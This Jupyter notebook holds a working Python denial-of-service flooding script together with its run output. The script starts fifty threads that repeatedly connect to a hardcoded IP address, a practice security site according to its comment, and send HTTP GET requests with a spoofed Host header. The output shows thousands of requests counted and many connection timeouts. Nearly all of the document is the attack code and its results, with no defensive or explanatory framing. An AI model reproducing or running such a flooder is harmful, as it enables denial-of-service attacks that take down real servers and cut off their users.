{
 "cells": [
  {
   "cell_type": "code",
   "execution_count": 10,
   "metadata": {},
   "outputs": [
    {
     "name": "stdout",
     "output_type": "stream",
     "text": [
      "100\n",
      "200\n",
      "300\n",
      "400\n",
      "500\n",
      "600\n",
      "700\n",
      "800\n",
      "900\n",
      "1000\n",
      "1100\n",
      "1200\n",
      "1300\n",
      "1400\n",
      "1500\n",
      "1600\n",
      "1700\n",
      "1800\n",
      "1900\n",
      "2000\n",
      "2100\n",
      "2200\n",
      "2300\n",
      "2400\n",
      "2500\n",
      "2600\n",
      "2700\n",
      "2800\n",
      "2900\n",
      "3000\n",
      "3100\n",
      "3200\n",
      "3300\n",
      "3400\n"
     ]
    },
    {
     "name": "stderr",
     "output_type": "stream",
     "text": [
      "Exception in thread Thread-2827:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-9-038650c8689d>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "Exception in thread Thread-2587:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-9-038650c8689d>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "Exception in thread Thread-2606:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-9-038650c8689d>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "Exception in thread Thread-2679:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-9-038650c8689d>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "Exception in thread Thread-2820:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-9-038650c8689d>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "Exception in thread Thread-2660:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-9-038650c8689d>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "Exception in thread Thread-2671:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-9-038650c8689d>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "Exception in thread Thread-2672:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-9-038650c8689d>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "\n",
      "\n",
      "Exception in thread Thread-2651:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-9-038650c8689d>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "Exception in thread Thread-2654:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-9-038650c8689d>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "\n",
      "Exception in thread Thread-2691:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-9-038650c8689d>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "Exception in thread Thread-2674:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-9-038650c8689d>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "Exception in thread Thread-1639:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-7-038650c8689d>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "\n",
      "\n",
      "\n",
      "\n",
      "Exception in thread Thread-2501:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-8-353d8ee3aafa>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "\n",
      "Exception in thread Thread-2661:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-9-038650c8689d>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "\n",
      "\n",
      "\n",
      "\n",
      "Exception in thread Thread-2399:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-8-353d8ee3aafa>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "Exception in thread Thread-2389:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-8-353d8ee3aafa>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "\n",
      "\n",
      "Exception in thread Thread-2383:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-8-353d8ee3aafa>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "Exception in thread Thread-2545:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-9-038650c8689d>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "\n",
      "Exception in thread Thread-2536:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-9-038650c8689d>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "\n",
      "\n",
      "\n",
      "\n",
      "\n"
     ]
    },
    {
     "name": "stdout",
     "output_type": "stream",
     "text": [
      "3500\n",
      "3600\n",
      "3700\n",
      "3800\n",
      "3900\n",
      "4000\n",
      "4100\n",
      "4200\n",
      "4300\n",
      "4400\n",
      "4500\n",
      "4600\n",
      "4700\n",
      "4800\n",
      "4900\n",
      "5000\n",
      "5100\n",
      "5200\n",
      "5300\n",
      "5400\n",
      "5500\n",
      "5600\n",
      "5700\n",
      "5800\n",
      "5900\n",
      "6000\n",
      "6100\n",
      "6200\n",
      "6300\n",
      "6400\n",
      "6500\n",
      "6600\n",
      "6700\n"
     ]
    },
    {
     "name": "stderr",
     "output_type": "stream",
     "text": [
      "Exception in thread Thread-2439:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-8-353d8ee3aafa>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "Exception in thread Thread-1684:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-7-038650c8689d>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "Exception in thread Thread-1633:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-7-038650c8689d>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "\n",
      "Exception in thread Thread-3020:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-10-202bed63576f>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "Exception in thread Thread-3034:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-10-202bed63576f>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "\n",
      "\n",
      "Exception in thread Thread-3023:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-10-202bed63576f>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "Exception in thread Thread-3029:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-10-202bed63576f>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "Exception in thread Thread-3027:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-10-202bed63576f>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "\n",
      "Exception in thread Thread-3014:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-10-202bed63576f>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "\n",
      "\n",
      "\n",
      "Exception in thread Thread-2599:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-9-038650c8689d>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "\n",
      "\n",
      "Exception in thread Thread-2580:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-9-038650c8689d>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "Exception in thread Thread-2677:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-9-038650c8689d>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "\n",
      "Exception in thread Thread-3010:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-10-202bed63576f>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "\n",
      "Exception in thread Thread-1774:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-7-038650c8689d>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "Exception in thread Thread-2483:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-8-353d8ee3aafa>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "Exception in thread Thread-3025:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-10-202bed63576f>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "\n",
      "\n",
      "\n",
      "Exception in thread Thread-2458:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-8-353d8ee3aafa>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "\n",
      "\n",
      "Exception in thread Thread-2497:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-8-353d8ee3aafa>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "Exception in thread Thread-3033:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-10-202bed63576f>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "\n",
      "Exception in thread Thread-2382:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-8-353d8ee3aafa>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "\n",
      "\n",
      "\n",
      "Exception in thread Thread-3016:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-10-202bed63576f>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "\n"
     ]
    },
    {
     "name": "stdout",
     "output_type": "stream",
     "text": [
      "6800\n"
     ]
    }
   ],
   "source": [
    "import socket\n",
    "import threading\n",
    "\n",
    "target=\"184.168.131.241\" #attacking http://www.itsecgames.com/\n",
    "port=80\n",
    "fake_ip=\"124.34.21.78\"\n",
    "\n",
    "connected=0\n",
    "\n",
    "def attack():\n",
    "    \n",
    "    while True:\n",
    "        \n",
    "        s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n",
    "        s.connect((target,port))\n",
    "        s.sendto((\"GET /\"+target+\" HTTP/1.1\\r\\n\").encode('ascii'),(target,port))\n",
    "        s.sendto((\"Host: \"+fake_ip+\"\\r\\n\\r\\n\").encode('ascii'),(target,port))\n",
    "        s.close()\n",
    "        \n",
    "        global connected\n",
    "        connected+=1\n",
    "        if(connected%100==0):\n",
    "            print(connected)\n",
    "\n",
    "for i in range(50):\n",
    "    thread=threading.Thread(target=attack)\n",
    "    thread.start()\n",
    "\n",
    "        \n",
    "    "
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": []
  }
 ],
 "metadata": {
  "kernelspec": {
   "display_name": "Python 3",
   "language": "python",
   "name": "python3"
  },
  "language_info": {
   "codemirror_mode": {
    "name": "ipython",
    "version": 3
   },
   "file_extension": ".py",
   "mimetype": "text/x-python",
   "name": "python",
   "nbconvert_exporter": "python",
   "pygments_lexer": "ipython3",
   "version": "3.7.4"
  }
 },
 "nbformat": 4,
 "nbformat_minor": 2
}
